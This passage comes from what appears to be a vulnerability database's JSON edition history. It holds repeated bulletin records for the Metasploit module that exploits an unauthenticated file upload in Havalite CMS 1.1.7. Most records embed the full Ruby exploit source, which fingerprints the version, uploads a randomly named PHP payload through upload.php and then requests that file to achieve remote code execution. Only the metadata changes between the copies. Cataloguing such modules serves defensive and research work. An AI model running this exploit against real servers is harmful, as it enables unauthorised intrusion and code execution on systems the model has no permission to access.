version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-09-10T07:52:31", "differentElements": ["modified", "published"], "edition": 65}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "3e0e8d75c29a5307c285afd3963ff327", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload 
Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-17T20:10:40", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-09-17T20:10:40", "differentElements": ["sourceData"], "edition": 66}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "d8a8900db352c2a9d98fa2554100226d", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", 
"description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-10-11T13:47:29", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-10-11T13:47:29", "differentElements": ["sourceData"], "edition": 67}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "3e0e8d75c29a5307c285afd3963ff327", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-10-11T15:47:01", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:0304", "RHSA-2019:0303"]}, {"type": "amazon", "idList": ["ALAS-2019-1156"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1671-1:EBBBE", "DEBIAN:DLA-1670-1:C56F6", "DEBIAN:DSA-4388-1:D6D01", "DEBIAN:DLA-1666-1:43CD3", "DEBIAN:DSA-4387-1:19CD5", "DEBIAN:DLA-1669-1:E907A"]}, {"type": "exploitdb", "idList": ["EDB-ID:46341", "EDB-ID:46340"]}, {"type": "ubuntu", "idList": ["USN-3886-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:9165290622393060450", "KITPLOIT:7455761002232864942"]}, {"type": "centos", "idList": ["CESA-2019:0270", "CESA-2019:0231", "CESA-2019:0229"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0155-1", "OPENSUSE-SU-2019:0154-1"]}, {"type": "freebsd", "idList": ["E8BCAC84-2D5C-11E9-9A74-E0D55E2A8BF9"]}], "modified": "2018-10-11T15:47:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly 
prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-10-11T15:47:01", "differentElements": ["modified", "published"], "edition": 68}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "1c6a84c103dae7b4255143c89774e47b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload 
Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-03-15T04:52:31", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:46513"]}, {"type": "redhat", "idList": ["RHSA-2019:0567", "RHSA-2019:0566", "RHSA-2019:0564", "RHSA-2019:0548", "RHSA-2019:0547", "RHSA-2019:0512", "RHSA-2019:0544"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0325-1", "OPENSUSE-SU-2019:0327-1", "OPENSUSE-SU-2019:0326-1"]}, {"type": "gentoo", "idList": ["GLSA-201903-11", "GLSA-201903-13", "GLSA-201903-14", "GLSA-201903-10", "GLSA-201903-12", "GLSA-201903-09"]}, {"type": "ubuntu", "idList": ["USN-3909-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1714-1:580CA", "DEBIAN:DLA-1713-1:F4DFB"]}], "modified": "2019-03-15T04:52:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2019-03-15T04:52:31", "differentElements": ["modified", "published"], "edition": 69}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "3e0e8d75c29a5307c285afd3963ff327", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload 
Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-03-15T07:06:16", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:46513"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4585"]}, {"type": "redhat", "idList": ["RHSA-2019:0567", "RHSA-2019:0566", "RHSA-2019:0564", "RHSA-2019:0548", "RHSA-2019:0547", "RHSA-2019:0512", "RHSA-2019:0544"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0325-1", "OPENSUSE-SU-2019:0327-1", "OPENSUSE-SU-2019:0326-1"]}, {"type": "gentoo", "idList": ["GLSA-201903-13", "GLSA-201903-11", "GLSA-201903-10", "GLSA-201903-14", "GLSA-201903-12", "GLSA-201903-09"]}, {"type": "ubuntu", "idList": ["USN-3909-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1714-1:580CA"]}], "modified": "2019-03-15T07:06:16"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2019-03-15T07:06:16", "differentElements": ["sourceData"], "edition": 70}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "d8a8900db352c2a9d98fa2554100226d", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", 
"description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-03T10:07:59", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1125-1", "OPENSUSE-SU-2019:1123-1", "OPENSUSE-SU-2019:1105-1", "OPENSUSE-SU-2019:1121-1", "OPENSUSE-SU-2019:1112-1", "OPENSUSE-SU-2019:1107-1", "OPENSUSE-SU-2019:1118-1", "OPENSUSE-SU-2019:1104-1", "OPENSUSE-SU-2019:1114-1", "OPENSUSE-SU-2019:1119-1"]}], "modified": "2019-04-03T10:07:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2019-04-03T10:07:59", "differentElements": ["sourceData"], "edition": 71}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "3e0e8d75c29a5307c285afd3963ff327", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-03T12:02:11", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DSA-4422-1:16F13"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1125-1", "OPENSUSE-SU-2019:1123-1", "OPENSUSE-SU-2019:1105-1", "OPENSUSE-SU-2019:1121-1", "OPENSUSE-SU-2019:1112-1", "OPENSUSE-SU-2019:1107-1", "OPENSUSE-SU-2019:1118-1", "OPENSUSE-SU-2019:1104-1", "OPENSUSE-SU-2019:1114-1", "OPENSUSE-SU-2019:1119-1"]}], "modified": "2019-04-03T12:02:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n 